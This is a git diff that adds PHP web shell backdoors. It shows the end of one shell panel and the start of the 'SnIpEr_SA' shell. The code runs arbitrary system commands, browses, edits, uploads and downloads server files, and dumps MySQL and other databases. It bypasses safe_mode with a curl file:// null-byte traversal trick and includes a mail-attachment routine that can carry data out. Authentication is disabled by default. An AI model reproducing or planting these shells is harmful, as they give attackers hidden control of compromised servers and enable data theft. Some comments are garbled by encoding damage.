+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/php/SnIpEr_SA Shell.php b/php/SnIpEr_SA Shell.php
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/php/SnIpEr_SA Shell.php	
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ÇáÎíÇÑÇÊ | Options  ~~~ */
+
+// ÇááÛÉ | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - áÊİÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ  ( authentification = On  )
+// $auth = 0; - áÇíŞÇİ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
+$auth = 0;
+
+// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
+// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
+// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔİÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí  'r57'
+// ÊÓÊÚØíÚ Çä ÊÔİÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ İí ÇáÎÇäÇÊ ÇáÊÇáíå
+$name='ec371748dc2da624b35a4f8f685dd122'; // ÇÓã ÇáãÓÊÎÏã  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ßáãÉ ÇáãÑæÑ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
